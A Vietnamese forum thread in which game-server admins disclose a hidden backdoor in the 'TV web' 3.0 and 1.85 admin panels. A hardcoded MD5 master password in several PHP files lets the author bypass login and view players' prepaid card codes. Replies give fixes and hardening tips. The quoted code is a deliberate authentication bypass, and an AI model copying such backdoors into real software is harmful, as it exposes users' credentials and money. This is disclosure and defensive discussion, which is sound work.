Cảnh báo ai sử dụng TV web 1.85 và 3.0

[apple]

Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
So sánh với tv 1.85 thì bản 1.85 cũng có.

Các admin mu lưu ý nhé.
Trong file:
Server\admin\security.php

có đoạn code này:

PHP Code:

if (md5($_GET['control']) != "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]")
if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
    echo "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
    exit();
}
?> 


dòng bôi đỏ là pass yêu tiên, chỉ TV mới có thể biết pass đó là gì vì nó bị mã hóa md5.

Server\admin\cardphone.php

PHP Code:

if ($_POST[submit]) {
    $pass = md5($_POST[codecard]);
    if ($pass == $passcard || $pass == "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]") $_SESSION['codecard'] = $passcard;
} 


đây là file các admin check thẻ mà lại có đoạn này.

trong file này:
Server\admin\view_card.php

PHP Code:

if ($_POST[submit]) {
    $pass = md5($_POST[viewcard]);
    if ($pass == "$passviewcard") $_SESSION['viewcard'] = "$passviewcard";
} 


trong file view_card.php lại ko có đoạn này. Vì file này ko xem được seri với mã thẻ, TV ko chèn đoạn pass mã hóa md5 kia vào.

tương tự trong file Server\admin\checkip.php
cũng có đoạn code đó:

PHP Code:

    if ($_POST[submit]) {
        $code = md5($_POST[code]);
        if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;
    } 


mục đích của đoạn này là check ip mà khi ko biết pass

Nếu các bạn ko tin thì có thể so sánh với NBB web:
Server\admin\cardphone.php

PHP Code:

if ($_POST[submit]) {
    $pass = md5($_POST[codecard]);
    if ($pass == "$passcard") $_SESSION['codecard'] = "$passcard";
} 


trong server/admin/checkip.php của NBB cũng hoàn toàn khác với TV:

PHP Code:

    if ($_POST[submit]) {
        $code = md5($_POST[code]);
        if ($code == "$passcode") $_SESSION['code'] = "$passcode";
    } 


Trên là các file nguy hiểm, nó ko sử dụng shell. Khi quét virus ko phát hiện là có shell

Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.

Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6

ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền

[mrrainnt]

Cái này bản 1.85 cũng có đấy chứ ! tại mọi người không để ý đấy thôi ^^!

[ductruong_kr]

dù sao mình cũng thks nếu k có nhưng người như bạn sao mà tớ biết nhỉ @@

[mrrainnt]

Sẵn đang làm cái này ^^! Up luôn cho các bạn folder Admin sạch 100% !
[Only registered and activated users can see links. ]
Pass Giải Nén: mrrainnt
Nhớ thanks đấy nhé !

[godhoang]

bản nbb 4.1 free cũng bị nè !
mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !

[mrrainnt]

bản nbb 4.1 free cũng bị nè !
mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !

???? auto nạp thẻ cơ à ! vậy chắc bị up shell hay bị gì rồi ? chứ NBB 4.1 Free đâu có zend code đâu !.

[TRIEN]

Sẵn đang làm cái này ^^! Up luôn cho các bạn folder Admin sạch 100% !
[Only registered and activated users can see links. ]
Pass Giải Nén: mrrainnt
Nhớ thanks đấy nhé !

hình như phần admin. của tv1.85 cũng giống 3.0 thì phải

[mrrainnt]

hình như phần admin. của tv1.85 cũng giống 3.0 thì phải

! Ừ, Đúng rồi bạn à. nó cũng tương tự nhau thôi bạn à ^^

[lengockien]

Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
So sánh với tv 1.85 thì bản 1.85 cũng có.

Các admin mu lưu ý nhé.
Trong file:
Server\admin\security.php

có đoạn code này:

PHP Code:

if (md5($_GET['control']) != "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]")
if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
    echo "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
    exit();
}
?> 


dòng bôi đỏ là pass yêu tiên, chỉ TV mới có thể biết pass đó là gì vì nó bị mã hóa md5.

Server\admin\cardphone.php

PHP Code:

if ($_POST[submit]) {
    $pass = md5($_POST[codecard]);
    if ($pass == $passcard || $pass == "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]") $_SESSION['codecard'] = $passcard;
} 


đây là file các admin check thẻ mà lại có đoạn này.

trong file này:
Server\admin\view_card.php

PHP Code:

if ($_POST[submit]) {
    $pass = md5($_POST[viewcard]);
    if ($pass == "$passviewcard") $_SESSION['viewcard'] = "$passviewcard";
} 


trong file view_card.php lại ko có đoạn này. Vì file này ko xem được seri với mã thẻ, TV ko chèn đoạn pass mã hóa md5 kia vào.

tương tự trong file Server\admin\checkip.php
cũng có đoạn code đó:

PHP Code:

    if ($_POST[submit]) {
        $code = md5($_POST[code]);
        if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;
    } 


mục đích của đoạn này là check ip mà khi ko biết pass

Nếu các bạn ko tin thì có thể so sánh với NBB web:
Server\admin\cardphone.php

PHP Code:

if ($_POST[submit]) {
    $pass = md5($_POST[codecard]);
    if ($pass == "$passcard") $_SESSION['codecard'] = "$passcard";
} 


trong server/admin/checkip.php của NBB cũng hoàn toàn khác với TV:

PHP Code:

    if ($_POST[submit]) {
        $code = md5($_POST[code]);
        if ($code == "$passcode") $_SESSION['code'] = "$passcode";
    } 


Trên là các file nguy hiểm, nó ko sử dụng shell. Khi quét virus ko phát hiện là có shell

Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.

Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6

ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền

tôi thấy rất là hài hước cho các làm mu online đê kiếm tiền và cơm áo mà đơn giản việc cài web ban đầu các bạn cũng không nhận ra để bảo mật. lẽ ra khi làm phải edit toàn bộ chú
các bạn hãy lưu ý kỹ thay đổi mã Md5 đi + edit ip về local 127.0.0.1
=> md5 trong server/admin/checkip.php =>
=> server/admin/listip.txt => nên coi lại cái này nhé cho về 127.0.0.1 => điên ip vào đây là đang nhập admin dc đấy
=> server/admin/security.php => fix luôn đi
=> ngoài server/conifig.php
$list_ip = array (
'127.0.0.1', =>
'115.112.187.78', =>> các bạn config kết nối trên host không nên để nhiều ip ở đây và không để ai biết ip nha vì đang nhập quyền admin bằng cái này được
);
lưu ý nũa phần home
admin
home/admin/config.php => mã md5 cần sửa
home/admin/security.php =>mã md5 cần sửa
home/admin/listip.txt => de ip 127.0.0.1 => chỉ mình trên máy chủ mới vào dc thôi còn bạn điền ip máy khác thì máy đó sẽ đăng nhập admin dc luôn
sorry hơi làng nhàng tí các bác thông cảm giùm

[apple]

! Ừ, Đúng rồi bạn à. nó cũng tương tự nhau thôi bạn à ^^

nó chẳng khác nhau là mấy, chỉ thêm 1 số chức năng thồi.